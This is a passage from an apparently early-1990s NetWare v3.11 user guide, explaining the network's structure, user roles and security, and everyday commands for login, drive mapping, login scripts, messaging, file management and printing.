NetWare should handle the request.  The shell sends the request to the
appropriate operating system, somewhat like a railroad track switcher sends
trains to the proper destination.

The workstation shell uses another file, IPX.COM, to send network messages to
the file server and, in some cases, directly to other network stations.  This
IPX protocol is the language the workstation uses to communicate with the file
server.

HOW ARE FILES STORED ON A NETWORK?

All network information is stored on the file server's hard disk.  The system
for storing that information is called the "directory structure."

The NetWare directory structure, or storage system, is organized into

o   File servers, which contain one or more
o   Volumes, which can span several hard disks and are divided into
o   Directories, which can contain other directories (subdirectories) and
o   Files.

A directory structure can be compared to a filing cabinet system.

o   The file server corresponds to the filing cabinet.

o   The volumes correspond to the filing cabinet drawers.  Each file server
    has at least one volume, the SYS volume, which is created when the server
    is installed.  In NetWare v3.11, however, one volume can span several
    hard disks.

o   The directories correspond to the hanging folders within the filing
    cabinet drawers.  You can create and delete directories to suit your
    organizational needs, much as you insert hanging folders into, and remove
    them from, a filing cabinet.

o   Directories can contain other directories, which are sometimes referred
    to as "subdirectories.  These directories within a directory then
    correspond to the manila folders inside the hanging folders.  They divide
    directories into smaller units, just as manila folders divide hanging
    folders into smaller units.

o   And finally, directories contain actual files, just as manila folders
    contain individual documents.  A file might be a letter or a list of
    addresses.  When you save information in a file, you give the file a
    unique name so you can retrieve it later.

WHO CAN USE THE NETWORK?

Before being able to work on the network, a person must be designated as a
network user.  Network users can be assigned four levels of responsibility on
the network.

o   Regular network users

o   Operators (file server console operators, print queue operators, print
    server operators)

o   Managers (workgroup managers, user account managers)

o   Network supervisors

Regular network users are the people who work on the network.  They can run
applications and work with files according to the rights assigned to them.

Operators are regular network users who have been assigned additional   
privileges.  For example, a file server console operator is a network user
who is given specific rights to use the FCONSOLE utility.

Managers are users who have been given responsibility for creating and/or
managing other users.  Workgroup managers can create and manage users; user
account managers can manage, but not create, users.  Managers function as
supervisors over a particular group, but they do not have supervisor
equivalence.

Network supervisors are responsible for the smooth operation of the whole
network.  Network supervisors maintain the system, restructuring and updating
it as needed.  Supervisors may also teach regular network users how to use the
network.

HOW IS INFORMATION PROTECTED ON A NETWORK?

All information on a NetWare network is stored in a central location---the file
server's hard disk.  However, all users should not be able to access all
information (such as payroll files).  In addition, users should not always be
able to access the same data file at the same time; otherwise, they may
overwrite each other's work.

To prevent problems like these, NetWare provides an extensive security system
to protect the data on the network.

NetWare security consists of a combination of the following:

o   Login security

    Login security includes creating usernames and passwords and imposing
    station, time, and account restrictions on users.

o   Trustee rights (privileges) assigned to users

    Trustee rights control which directories and files a user can access and
    what the user is allowed to do with those directories and files, such as
    creating, reading, erasing, or writing to them.

o   Attributes assigned to directories and files

    Directory and file attributes determine whether that directory or file
    can be deleted, copied, viewed, or written to.  Among other things, they
    also mark a file as shareable or non-shareable.

These three levels of security work together to protect the network from
unauthorized access.

REVIEW

This introduction explained the following:

o   A NetWare network links personal computers so users can communicate and
    share resources.

o   A NetWare network consists of two or more workstations and at least one
    file server.

    Workstations are personal computers on which network users do their work.
    Workstations run their own native operating system (for example, DOS) and
    process their own files.  They can access files, applications, and
    resources through the file server.

    File servers are personal computers that use the NetWare operating system
    to coordinate all network activities.

o   Workstations and the file server communicate via the NetWare shell, which
    must be loaded into each workstation (just as DOS must be loaded into
    each workstation).  NET3 or NET4 (the NetWare shells corresponding to DOS
    3.x or 4.x) sends workstation requests to the proper operating system
    (file server or workstation) for processing.

o   The shell uses a protocol, such as IPX, to send messages to the
    appropriate network station.

o   Information is stored on the file server in a directory structure that is
    made up of volumes, directories, and files.

o   There are four types of network users:  regular network users, network
    operators, network managers, and network supervisors.  The type of user
    you are is determined by your responsibilities.

o   NetWare's extensive security system prevents users from corrupting data
    in network files and prevents unauthorized users from accessing
    restricted files.

WHAT ARE MENU AND COMMAND LINE UTILITIES?

You use NetWare utilities to perform network tasks.  There are two types of
utilities: menu utilities and command line utilities.  Menu utilities let you
perform network tasks by choosing options from menus.  Command line utilities
let you perform tasks by typing commands at the DOS command line.  This section
explains how to execute both types of NetWare utilities.

WORK WITH MENU UTILITIES

Access a Menu Utility

To access a menu utility, such as FILER, type the utility's name
at the DOS prompt and press <Enter>.  The utility's main menu
is displayed along with a screen header showing the following:

o   The utility's full name
o   The current date and time
o   The directory path leading up to your current directory (some utilities)
o   Your username on your file server (some utilities)
o   Your connection number (some utilities)

Exit a Menu Utility

There are two ways to exit a menu utility:

o   Press <Escape> until an exit confirmation box appears.  Then highlight
    "Yes" and press <Enter>.

o   Press the Exit key (usually <Alt><F10>).  Do not press the Exit key to exit
    a menu utility if you have made changes within the utility; if you do, the
    changes are not saved.  Exiting via the Escape key saves your changes.

Additional Information

Once you have accessed a menu utility and the main menu is displayed, you are
ready to work.  Menu utilities use certain keys to perform special functions.
The utilities also have certain standard components.  The keys, wildcards, and
components are described below.

F1  (Help) Key.  Displays help screens.
    If you press the help screen once, a help screen that applies to the task
    you are currently working on appears.  The help screen describes all the
    options on the screen.  To get help on a specific option, highlight the
    option and press <Enter>.

    If you press the Help key twice, your computer's function key assignments
    are listed.  There are three screens containing function key assignments.
    Press the <PageDown> key to see subsequent screens.

F5  (Mark) Key.  Allows you to mark multiple items in a list so you can add or
    delete several items at once.

Esc (Escape) Key.  Has three functions:

    1)   If you are on a menu screen, pressing <Escape> allows you to return to
         a previous menu.

    2)   If you are at the main menu, pressing <Escape> causes an exit
         confirmation box to appear.  By highlighting "Yes" and pressing
         <Enter>, you exit the menu utility and return to the menu or command
         line prompt.

    3)   If you are performing a process, pressing <Escape> allows you to
         continue.

Wildcard characters (* and ?).  DOS and NetWare recognize these as universal
replacements for any other character or set of characters.  Wildcards can be
used to search for groups of volumes, directories, or files, or they can be
used to search for a particular file when you are unsure of its complete
name.

An asterisk (*) in a filename indicates that any character can occupy that
position and all remaining positions in the filename.  For example, in the
FILER utility, to copy all subdirectory's files with the extension .EXE to
another directory, type "*.EXE" in the menu's entry box and press <Enter>.

In contrast, a question mark (?) in a filename indicates that any character can
occupy that position, and that position only.  So, if you were to type
"ACCOUNT?.NEW", you would copy files like ACCOUNT1.NEW, ACCOUNT2.NEW, and so
on.

NetWare's use of wildcard characters differs from DOS's in one respect.  For
example, to represent all files in a directory, DOS expects you to type "*.*",
whereas NetWare only needs one asterisk (*).

For more information about wildcard characters (global filename characters),
see your DOS manual.

Components.  When you first access a menu utility, the main menu is displayed.
Menus contain options you can choose from.  Options can be selected one of two
ways:

o   You can use the arrow keys to highlight the option you want. Then press
    <Enter>.

o   You can type the first letter of an option to highlight that option.  If
    more than one option in the menu starts with the same letter(s), type
    enough additional letters to distinguish one option from the others.  (For
    example, if both "Search" and "Select" were options, you would have to type
    "Sel" to highlight "Select.")  Once the option you want is highlighted,
    press <Enter>.

When you select an option from the main menu, additional menus and displays
appear on the screen.  These displays include lists, entry boxes, insets,
forms, and confirmation boxes.  Each type of screen display is explained
below.

Lists               Lists are similar to menus, and items in the lists can be
                    selected the same way menu options are.  However, you can
                    also add to and delete items from some lists.  Lists may
                    have more than one column, and they may extend below the
                    screen display.  Press the Down-arrow key to see additional
                    items.  Pressing <Ctrl><PageDown> takes you to the bottom
                    of the list.  Pressing <Ctrl><PageUp> takes you to the top
                    of the list.

Entry boxes         Entry boxes are boxes in which you can get information,
                    such as a username or pathname.  The Delete, Backspace, and
                    arrow keys work in these boxes.

Insets              Insets display information that cannot be edited (except by
                    the network supervisor).  Regular users cannot add to or
                    delete from the information in this window.

Forms               Forms are windows that contain fields.  You can move around
                    in a form using the arrow keys or the Enter key.  (When you
                    press <Enter>, the cursor moves to the next field in the
                    form.)  You can change the information in the field by
                    highlighting the field and pressing <Enter>.

                    What you do next depends on the type of field.  Some fields
                    allow you to type in information; others display menu items
                    to select.

Confirmation boxes  Confirmation boxes are displayed whenever you exit a menu
                    utility or whenever you create or delete items (such as
                    directories or files).  You can either confirm or cancel
                    the action by selecting "Yes" or "No" and pressing <Enter>.

WORK WITH COMMAND LINE UTILITIES

Command Format

The command format displays the appropriate syntax for command line utilities.
Command line utilities are typed in at the DOS prompt.

The following are examples of the command formats for the NPRINT and the TLIST
utilities:

    NPRINT path [option...]  <Enter>

    TLIST [path [USERS | GROUPS]]  <Enter>

Conventions

The conventions for these example command formats are explained below:

NPRINT      Words that appear in all capital letters must be spelled exactly as
            shown.  Although they appear in capital letters, they can be typed
            in either upper or lower case.

path        Words that appear in lower case are variables.  They should be
            replaced with the information pertinent to your task.  In this
            case, "path" would be replaced with the path leading to and
            including the file you want to indicate, and you would replace
            "option" with any NPRINT options you want to specify.

[ ]         Square brackets indicate that the enclosed item is optional:  you
            can enter a command with or without the enclosed item.  In this
            case, "option" is optional.

....        Ellipses indicate that more than one option can be used with the
            command.  In this case, more than one NPRINT option can be entered
            in the command.

<Enter>     The angle brackets indicate that you should press the key whose
            name appears between them.

            Always press <Enter> after typing the command format for
command
            line utilities.

[[ ]]       Nested square brackets indicate that all enclosed items are
            optional.  However, if you use the item(s) within the innermost
            brackets, you must also use the item(s) within the outer brackets.

|           A vertical bar or "pipe" means "either, or."  You can use either
            the item to the left of the vertical bar or the item to the right,
            but not both.

Wildcard Characters

DOS and NetWare recognize wildcard characters (* and ?) as universal
replacements for any other character or set of characters.  Wildcards can be
used to search for groups of volumes, directories, or files, or to search for a
particular file when you are unsure of its complete name.

An asterisk (*) in a filename indicates that any character can occupy that
position and all remaining positions in the filename.  For example, to search
for all filenames with the extension .EXE in your default directory, type "NDIR
*.EXE" and press <Enter> to display the list.

In contrast, a question mark (?) in a filename indicates that any character can
occupy that position, and that position only.  So, if you were to type "NDIR
*.?", you would see a list of all files in your default directory with a
single-character extension or no extension at all.

NetWare's use of wildcard characters differs from DOS's in one respect.  For
example, to represent all files in a directory, DOS expects you to type "*.*",
whereas NetWare only needs one asterisk (*).

For more information about wildcard characters (global filename characters),
see your DOS manual.

GET HELP IN NETWARE

Use the NetWare HELP utility to view on-line information about NetWare
utilities, NetWare system messages, and NetWare concepts.  NetWare HELP allows
you to search for and retrieve information from infobases (information
databases).  To access HELP, type

    HELP  <Enter>

Press <Enter> again to bring up the main menu.  For more information on how to
use NetWare HELP, press the Tab key until you get to "How to use this
reference."  Then press <Enter>.

BOOT UP

To "boot up" your workstation means to turn on your computer, load DOS, and
then load the workstation shell.  You accomplish all of this with a boot
diskette, or you can put the necessary boot files on your workstation's hard
disk.  These boot files start up the workstation operating system, load the
NetWare shell, and gain access to the network.

Create Boot Diskettes

1.  Format a blank diskette as a boot diskette, using the DOS FORMAT command. 
    Insert a diskette into drive A and type

        Format a: /s  <Enter>

    Follow the screen prompts.

2.  Copy IPX.COM and the shell file (NETx.COM) onto the boot diskette or to the
    root directory of your workstation's hard disk.

    If your workstation uses DOS 3.x, use NET3.COM.

    If your workstation uses DOS 4.x, use NET4.COM.

3.  Copy these following additional boot files to the boot diskette or your
    hard disk, if needed.  Your network supervisor can provide you with these
    files:

    AUTOEXEC.BAT
    CONFIG.SYS
    SHELL.CFG

    See also "Boot files" in NetWare v3.11 Concepts and Appendix A in NetWare
    v3.11 Installation.

4.  Label the boot diskette.

Create an AUTOEXEC.BAT File

You can create an AUTOEXEC.BAT file that automatically loads the shell file
each time you boot the workstation.  This AUTOEXEC.BAT file can also set your
workstation to the first network drive (F), connect you (user MARIA) to a file
server (WONDER), and set your DOS prompt to show your current directory (PROMPT
$P$G).

Follow these steps to create your AUTOEXEC.BAT file:

1.  Insert your boot diskette into drive A and change to drive A.  If you plan
    to boot from your hard disk, change to your hard disk drive (C or D).

2.  If you are using DOS 4.x, type

        COPY CON AUTOEXEC.BAT  <Enter>
        IPX  <Enter>
        NET4  <Enter>
        F:  <Enter>
        LOGIN WONDER/MARIA  <Enter>
        PROMPT $P$G  <Enter>
        <Ctrl>Z  <Enter>

    If you are using DOS 3.x, replace NET4 with NET3.

LOGIN/LOGOUT

When you log in to a network, you establish a connection between your
workstation and the file server.  When you log out, you terminate that
connection.

To log in to the network, you must type in a unique password.  If there were no
password, other unauthorized users could easily get to your files and use them
for their purposes.

Log In to Your Network

To log in to your default server, type

    LOGIN servername/username  <Enter>

Replace servername with the name of the file server you want to log in to.
Replace username with your login name and (if applicable) type your password
when you are prompted for it.

Log Out of Your Network

To log out of your default server, type

    LOGOUT  <Enter>

To log out of a file server you are attached to, type

    LOGOUT servername  <Enter>

Attach to Another File Server

Attach to another file server if you want to do the following:

o   Send messages to users on that file server

o   Map a drive to that file server

o   Copy a directory to that file server

To access another file server while remaining logged in to your default file
server, type

    ATTACH servername/username  <Enter>

Replace servername with the name of the server you want to attach to.  Replace
username with the username you have been assigned to use on that file server.

Create or Change a Password

1.  To create or change a password on your default server, type

        SETPASS  <Enter>

    The following prompt appears on the screen:

    Enter your old password:

2.  If you are changing a password, enter the old password.  If you are
    creating a new password, press <Enter>.  The following prompt appears on
    your screen:

    Enter your new password:

3.  Enter the password you want.  The following prompt appears:

    Retype your new password:

4.  Enter the new password again.  The following message appears on your
    screen:

    Your password has been changed.

View Who You Are on Your Network

Type

    WHOAMI  <Enter>

Information similar to the following is displayed:

    You are user FRANK attached to server MKTG, connection 1
    Server MKTG is running NetWare v3.11.
    Login time:  Wednesday October 2, 1991  8:05 am

    You are user GUEST attached to server ACCT, connection 7
    Server ACCT is running NetWare v3.11.
    Login time: Wednesday, October 2, 1991  8:05 am


This screen display indicates that you are attached to both file servers MKTG
and ACCT.  Your username on MKTG is FRANK, and your username on ACCT is GUEST.

View File Servers on Your Network

Type

    SLIST  <Enter>

Information similar to the following appears:

    Known NetWare File Servers   Network   Node Address
    --------------------------   -------   ------------
    RECORDS                     [CED88]   [2608C234732]
    SALES                       [CED87]   [2608C217651]
    MFG                         [CED86]   [2608C293185]

View Current Users on Your File Server

You must be attached to a file server before you can view the list of users for
that file server.

Type

    USERLIST  <Enter>

Information similar to the following appears:

    User Information for Server BLOOM
    Connection  User Name     Login Time
    ----------  ---------     ------------------
    1           JOE           4-17-1991  8:05 am
    2           *CORRINE      4-17-1991 11:20 am
    3           PAULO         4-17-1991  7:58 am
    4           GUS           4-17-1991  6:01 pm

An asterisk (*) appears next to your username.

What If ...

.... I can't log in?

o   Your password may have expired or you may have run out of grace logins.

    Your supervisor or manager has to unlock your account.

o   You haven't changed to the network login drive (F).

o   The LOGIN.EXE file is missing.

o   Your shell may be outdated.  Type

        NVER  <Enter>

    Report the version number to your supervisor.

o   Your network board may not be seated correctly.

o   Your file server may be down.  Type

        SLIST  <Enter>

    If your file server is listed, log in by typing

        LOGIN servername/username  <Enter>

o   You may be restricted from logging in during certain times.  Ask the
    network supervisor.

.... My screen is frozen?

o   Your supervisor should run the MONITOR utility and clear your connection.
    This saves the work you were doing.  Then complete one of the two following
    tasks:

    o   To warm boot, press <CTRL><ALT><DEL> simultaneously.

    o   To cold boot, turn the computer OFF, wait 15 seconds, and then turn it
        ON again.

o   Your network cable may not be connected or terminated properly.  Notify
    your supervisor.

o   Your node (or station) address may be in conflict with another workstation.
    See if new workstations have been added to your network.

o   You may have the wrong IPX configuration.  Ask your supervisor.

o   You may have received a message while in graphics mode.  Disable messages
    before entering graphics mode by typing

        CASTOFF  <Enter>

CREATE YOUR LOGIN SCRIPT

Your login script is a program that automatically sets up your workstation's
environment each time you log in.  It performs tasks such as mapping network
drives for you, automatically executing programs and starting applications, and
attaching you to different file servers.

This section introduces some basic login script commands.

To access your login script, follow these steps:

1.  Type

        SYSCON  <Enter>

2.  Select "User Information" from the main menu.

3.  Select your user name from the list of users that appears.

4.  Select "Login Script."

5.  Enter the commands you need in your login script.  Some common commands are
    listed under "Common Login Script Commands" below.

6.  Exit and save the login script by pressing <Escape> and answering "Yes" in
    the confirmation box.

7.  To execute your new login script, you must first log out of the network,
    and then log in again.

Common Login Script Commands

The commands below can be used in your login script.  Each command is followed
by its purpose and an example of how to use it.

MAP INS16:=     Inserts the drive as the next available search drive.

                        MAP INS16:=pd3sys:jan

MAP drive:=     Maps the specified drive to the given directory.

                        MAP G:=pd3sys:homejan

MAP *n:=        Maps the next available drive to the given directory.

                        MAP *1:=pd3sys:homejan

#               Runs an executable file (a file with an .EXE or .COM
                extension).

                        #SYSCON

REMARK          These three commands allow you to insert explanatory text in
*               the login script.  They will not appear on your screen.
;
                        REMARK Be sure to update the PROJECTS file.

                        * Check for new mail.

                        ; Assign OS-dependent Search mappings.

ATTACH          Allows you to attach to other file servers while remaining
                logged in to your current file server.

                ATTACH pd3jan

SET             Allows you to set DOS variables.

                SET wp="/u-jlw/"

                SET usr="jwilson"

IF...THEN       Executes certain commands, if a specified condition exists.

                IF DAY_OF_WEEK="Monday" THEN WRITE "AARGH..."

What If ...

.... My login script doesn't execute all the way?

o   You may have inserted an EXIT command to a batch file in the middle of your
    login script.  Anything after the EXIT command is ignored.  Move the EXIT
    command to the end of your login script.

o   An IF...THEN clause in your login script may be incomplete or incorrect. 
    Check the proper command format in Appendix A of NetWare v3.11
    Installation.

.... I am unable to map a drive to another file server?

The file server you want to map a drive to may be down.  To check whether the
file server is up, type

        SLIST  <Enter>

.... I add some mapped drives to my login script and some I wanted are gone?

The system login script executes before the user login script.  You can
overwrite the mapped drives in the system login script with those in your user
login script.  Instead of using the command "map drive:=", use the command "map
ins 16:=" or "map *1:=". (Remember: You can have only 26 drive mappings.)

VIEW OR CREATE YOUR MAPPED DRIVES

Mapped drives point to particular locations in the directory structure.  In
NetWare, there are three type of drives: local drives, network drives, and
search drives.  Local drives are physically attached to a workstation.  Network
drives allow users to access particular locations in the directory structure.
Search drives allow users to execute program files (such as applications or
utilities) that are in a directory other than the user's current directory.
For more information, see "Drive mappings" in NetWare v3.11 Concepts.

This section tells you how to do the following:

o   View all mappings
o   Map network drives
o   Map search drives

View All Mapped Drives

Type

    MAP  <Enter>

You see information similar to the following:

    DRIVE A:  maps to a local drive
    DRIVE B:  maps to a local drive

    DRIVE F:= COUNT/SYS:  /HOME/KAREN
    DRIVE G:= COUNT/SYS:  /
    DRIVE H:= COUNT/ACCT: /ACCDATA

    -------

    SEARCH1:=Z:  [COUNT/SYS:  /PUBLIC]
    SEARCH2:=Y:  [COUNT/SYS:  /PUBLIC/WP]
    SEARCH3:=X:  [COUNT/ACCT:  /ACCREC]

Map Network Drives

Suppose you want to map a network drive to a directory in which you have files.
To see what network drive letters are available, type

    MAP  <Enter>

Choose a drive letter that is not being used, such as J.  Type

    MAP J:= path  <Enter>

Replace path with the directory path (including the file server name and the
volume name) leading to the directory to which you want to map network drive J.

For example, suppose your username is MARIA and you want to map drive J to your
home directory, which is on file server COUNT in volume SYS.  Type

    MAP J:= COUNT/SYS:HOME/MARIA  <Enter>

MAP SEARCH DRIVES

Suppose your search drives appear as follows:

    SEARCH1:=Z:  [COUNT/SYS:  /PUBLIC]
    SEARCH2:=Y:  [COUNT/SYS:  /PUBLIC/WP]

The next available search drive is SEARCH3 (S3).  To map a
search drive to directory ACCREC on volume ACCT, type

    MAP S3:=COUNT/ACCT:ACCREC  <Enter>

When you type MAP again, the new search drive appears:

    SEARCH1:=Z:  [COUNT/SYS:  /PUBLIC]
    SEARCH2:=Y:  [COUNT/SYS:  /PUBLIC/WP]
    SEARCH3:=X:  [COUNT/ACCT:  /ACCREC]

What if ...

.... I just mapped a drive and then rebooted, and now the mapped drive is gone?

Did you map the drive in your login script?  Drives mapped at the command line
are temporary----they are deleted when you log out of your file server or turn
off your workstation.  If you want the mapping to be permanent, you must enter
it in your login script.

.... The system won't accept my mapped drives?

o   You may not have rights to the directory you want to map to.  Change to
    that directory and type

        RIGHTS  <Enter>

    If your rights aren't sufficient, see your supervisor.

o   You may have used the wrong command format.


.... I just viewed my mapped drives and some of them seem to be incorrect?

Did you use the DOS CD command to change your default directory?  Changing
directories changes your mapping.

.... My search drives are in reverse order?

Search drives are numbered, but their associated drive letters begin in reverse
alphabetical order.  For example, the first search drive (Search 1 or S1)
appears as network drive Z, the second one appears as network drive Y, and so
on.  However, in your login script, they should appear in normal alphabetical
order.

SEND MESSAGES TO OTHER USERS

You can communicate with other users on your network by
sending messages from your workstation command line.

This section explains how to do the following:

o   Send a message to one or more users
o   Send a message to all workstations
o   Block/allow messages from other workstations

Send a Message to One or More Users

Suppose you want to send the following message to users CINDY and ERIC:
"Meeting at 1:30 today."  Also suppose that CINDY and ERIC are logged in to
your default server.  Type

    SEND "MEETING AT 1:30 TODAY" CINDY, ERIC  <Enter>

A confirmation message appears, telling you that the message was sent.

If CINDY is logged in to another file server called SALES, attach to that file
server and type

    SEND "MEETING AT 1:30 TODAY" SALES/CINDY  <Enter>

Send a Message to All Workstations

Suppose you want to send the following message to all workstations: "Paychecks
are here."  Type

    SEND "PAYCHECKS ARE HERE." EVERYONE  <Enter>

A confirmation message appears listing all the users to whom the message was
sent.

If you want to send a message to everyone on another file server, you must be
attached to that file server and specify the name of the file server in the
command.


Block/Allow Messages from Other Workstations

If you do not want to receive messages sent to you from any network stations,
type

    CASTOFF   <Enter>

The following message appears on your screen:

    Broadcasts from other stations will now be rejected.

To allow your workstation to again receive messages from other network users,
type

    CASTON  <Enter>

The following message appears on your screen:

    Broadcast messages from the console and other stations will now be
    accepted.

What If ...

.... I am unable to send a message to a user?

o   Is the user logged in?  Type

        USERLIST  <Enter>

o   Is your message buffer full?  You can only receive up to two messages. You
    must clear these messages from your screen (by pressing <Ctrl><Enter>)
    before you can receive others.

o   Did you type the SEND command properly?

.... I am unable to send messages to users on another file server?

o   Did you attach to that file server?
o   Is the user logged in?  Type

        USERLIST  <Enter>

o   Did you type the SEND command properly?


MANAGE FILES AND DIRECTORIES

You can manage your files and directories in a variety of ways.  You can copy,
delete, rename, view, write to, share, and print them.  NetWare uses a system
of file and directory rights and attributes to make sure that only authorized
network users can access and handle network data.

Attributes are assigned to files and directories.  They override rights, which
are assigned to users.  For example, suppose you have the right to rename files
(the Modify right).  However, the file you want to copy is flagged with the
Rename Inhibit attribute.  This prevents you from renaming it, even though you
have the right to do so.

For more information, see "Attributes" and "Rights" in NetWare v3.11 Concepts.

Know Your Rights

To view your rights in your default directory, type

    RIGHTS  <Enter>

If your effective rights include all rights, the following information appears:

    SERVER1SYS:PUBLICUTIL
    Your effective rights for this directory are [SRWCEMFA]
        You have Supervisor Rights to Directory. (S)
       *May Read from File.                      (R)
       *May Write to File.                       (W)
        May Create Subdirectories and Files.     (C)
        May Erase Directory.                     (E)
        May Modify Directory.                    (M)
        May Scan for Files.                      (F)
        May Change Access Control.               (A)

    *Has no effect in directory.

    Entries in Directory May Inherit [SRWCEMFA] rights.  You have ALL RIGHTS to
    Directory Entry.

Copy a File to Another Network Directory

Suppose you want to copy a file called ACC.DAT from your default directory (for
example, F) to the SALEPROG directory in volume SYS on the file server SALES.
First, make sure you have a drive (for example, G) mapped to SALEPROG as
follows:

    G:=SALES/SYS:SALEPROG

To copy ACC.DAT from your default directory to the SALEPROG directory, type

    NCOPY F:ACC.DAT TO G:  <Enter>

Suppose you want to copy a file called ACC.DAT from the SALEPROG directory in
volume SYS on the file server SALES to your default directory.  Also suppose
drive G is mapped to SALEPROG as G:=SALES/SYS:SALEPROG.  Type

    NCOPY G:ACC.DAT F:  <Enter>

Copy All of a Directory's Files to Another Directory

1.  Type

        FILER  <Enter>

    and select "Directory Contents" from the "Available Topics" menu.

2.  Select the directory you want to copy from the "Directory Contents" window.
    The "Subdirectory Options" window appears.

3.  Select "Copy Subdirectory's Files."  The "Copy Subdirectory To:" window
    appears.

4.  To copy subdirectory files, complete one of the following:

    o   Copy to a subdirectory in your current directory.  Type the name of the
        directory; then press <Enter>.

        You can also use <Insert> to bring up the "File Servers/Local Drives"
        window, from which you can select your directory path by selecting file
        server, volume, and directory options.

        After you select your directory path, press <Escape> to bring your
        cursor back to the "Copy subdirectory To:" window.  Then press <Enter>
        to copy your subdirectory's files.

    o   Copy to a directory on another volume on your file server.  Type in the
        name of the volume and directory; then press <Enter>.

        You can also use <Insert> to bring up the "File Servers/Local Drives"
        window, from which you can select your directory path by selecting file
        server, volume, and directory options.

    o   Copy to a directory to another file server.  You must be attached to
        the file server you want to copy files to.  Type in the name of the
        file server, volume, and directory; then press <Enter>.

Delete a File

1.  Type

        FILER  <Enter>

2.  Select "Directory Contents" from the "Available Topics" menu.

3.  Highlight the file you want to delete from the "Directory Contents" window
    and^S press <Delete>.  Answer "Yes" in the confirmation box.

    To delete more than one file, use the Mark key (<F5>) to highlight multiple
    files; then press <Delete>.  Answer "Yes" in the confirmation box.

Salvage a File You Just Deleted

1.  Type

        SALVAGE   <Enter>

2.  Select "View/Recover Deleted Files" from the "Main Menu Options"window. 
    To change to another volume, you must select the directory path from the
    "Select Current Directory" option in the main menu.

Note:   If you have too many salvageable files to fit on the screen, you will
        see the heading "Inc^Qomplete."  Scroll through the list to see the
        entire list, or use the Mark Pattern key <F6> to mark the file pattern.
        Then exit the list and reenter it.

3.  To salvage files using wildcards or to salvage a specific file, type the
    information in the "Erased File Name Pattern To Match" window.

    To view all salvageable files, press <Enter>.

4.  To salvage a file, complete one of the following:

    o   Salvage a single file.  Select the file you want to salvage. Select
        "Yes" from the "Recover This File" box.

    o   Salvage multiple files.  Use the Mark key (<F5>) to select multiple
        files.  Select "Yes" from the confirmation box.

    o   Salvage multiple files using wildcards.  To match a filename pattern or
        extension, press the Mark Pattern key (<F6>) and type the pattern you
        want to match.

        Once you match the pattern of the files you want to salvage, press
        <Enter> and select "Yes" from the "Recover ALL marked files?"
        confirmation box.

5.  Press <Escape> to exit SALVAGE.

Find a Lost File

Suppose you don't remember the location of a file.  The file is called
FUTURE.DAT.  You think it may be in the PROGRAMS directory, and drive G is
mapped to that directory.

To find the location of the lost file, type

    NDIR G: FUTURE.DAT  <Enter>

If you don't know which directory the file is in, change directories back to
the volume level.  Then type

    NDIR filename sub  <Enter>

The NDIR utility searches all those directories you have rights to on the
volume for the file.

Rename a Directory

Suppose you want to change the name of the ACCT directory to PROGRAMS.  Also
suppose drive G is mapped to ACCT in volume SYS on file server RECORDS as
follows:

    Drive G: = RECORDS/SYS:ACCT

To rename the directory, type

    RENDIR G: PROGRAMS  <Enter>

Note:   You must be attached to a file server before you can change the name of
        a directory on that file server.

        You must also have the Modify right in the directory to rename
        subdirectories in that directory.

        Drive mappings in login scripts (if they exist) must be changed to
        reflect the new name of the directory.

What If ...

.... I can't copy?

o   You may not have sufficient rights.  Type

        RIGHTS  <Enter>

    You must have the Create right to copy files into a directory.

o   The file may be flagged "non-shareable" and may be in use. Type

        FLAG filename  <Enter>

    If it is flagged "non-shareable," try again at a later time, when the file
    is not in use.


.... I can't see a directory?

o   You may not have enough rights to that directory.  Type

        RIGHTS  <Enter>

o   The directory attribute may be set to "Hidden" or "System." Type

        FLAG filename  <Enter>

o   The directory may have set disk space limitations.  To view the directory
    restrictions, type

        DSPACE  <Enter>

o   The directory may have been deleted.  Ask your supervisor.

PRINTING

Printing from a network workstation is similar to printing from a stand alone
workstation.  When you send a print job to a network printer, however, the job
is routed first through the file server and then delivered to the printer by
the print server.

When a print job leaves the workstation, it is stored temporarily in a print
queue on the file server.  This queue, which is a subdirectory on the file
server, stores the print job until the print server can deliver it to the
printer.  When the printer is ready to service the job, the print server moves
it from the queue to the printer.

Permanently Set Up Workstation Printing

If you want to print from a non-NetWare-compatible application or from the
screen, you need to route print files from your local printer port (LPT1) to a
file server queue.

1.  Enter the SYSCON utility.

2.  Select "User Information" from SYSCON's main menu.

3.  Select your username.

4.  Select "Login Script."

5.  Insert the following command into the login script:

        #CAPTURE Q=queuename TI=5

6.  Exit SYSCON, saving changes when prompted.

7.  Log back in to or reboot your workstation to allow the CAPTURE command to
    take effect.

Print Screens Using CAPTURE

Before you start printing screens using CAPTURE, you need to set the CAPTURE
parameters in your login script.  See "Permanently Set Up Workstation Printing"
on the previous page. Also, your supervisor needs to set up a default queue.

1.  At the command line, type

        CAPTURE  <Enter>

    You can include any of the CAPTURE options except Show.  Some of the most
    common CAPTURE options are the following:

    L=n
        Indicates which of your workstation's LPT ports (local parallel
        printing ports) to capture.  Replace "n" with 1, 2, or 3.  Default:

  ^S^Q      L=LPT1

    Q=queuename
        Indicates the queue the print job should be sent to.  If multiple
        queues are mapped to a printer, you must include this option.  Replace
        "queuename" with the name of the queue.

    TI=n
        Indicates the number of seconds between the last time the application
        writes to the file and the time it releases the file to the queue. 
        Include this option if you want to print from an application without
        exiting the application.  Replace "n" with a number of seconds
        (1-1000).  Default: TI=O  (Timeout disabled)

2.  Access the application containing the screen you want to print.

3.  Press <Shift><Print Screen>.

4.  If you want to print more screens, repeat steps 2 and 3.

5.  When you have selected the screens you want printed, return to the DOS
    prompt and type

        ENDCAP  <Enter>

    ENDCAP sends your print job to the default print queue of your default file
    server, and then the job is printed. ENDCAP also ends the capture of your
    LPT port.

Note:   Your workstation might hang if you press the <Shift><Print Screen> keys
        when none of your LPT ports are captured and no local printers are
        attached to your workstation.  To prevent this, ask your supervisor to
        include the following line in the SHELL.DFG file on your workstation
        boot disk.

        LOCAL PRINTERS = 0

List the Jobs in a Queue

A queue is a special directory where print files are stored while waiting for
printer services.  To see which jobs are waiting in a queue to be printed,
complete the following steps:

1.  Type

        PCONSOLE  <Enter>

2.  Select your file server (if other than your current file server).

3.  Select "Print Queue Information" from the "Available Options" menu.

4.  Select the print queue whose print job you want to view.  If you don't know
    the name of the print queue, ask your supervisor.

5.  Select "Current Print Job Entries" from the "Print Queue Information" list.
    The print job entries are displayed.

Delete Your Print Job from a Queue

You can cancel your print job by deleting it from the print queue (even after
the job has started printing).  You can delete a print job only if you are the
owner of the job or if you are the print queue operator.

To delete your print job, complete the following steps:

1.  Type

        PCONSOLE  <Enter>

2.  Select "Print Queue Information" from the "Available Options" menu.

3.  Select the print queue whose entries you want to view.  The "Print Queue
    Information" list is displayed.

4.  Select "Current Print Job Entries."

5.  Highlight the print job entry and press <Delete>.
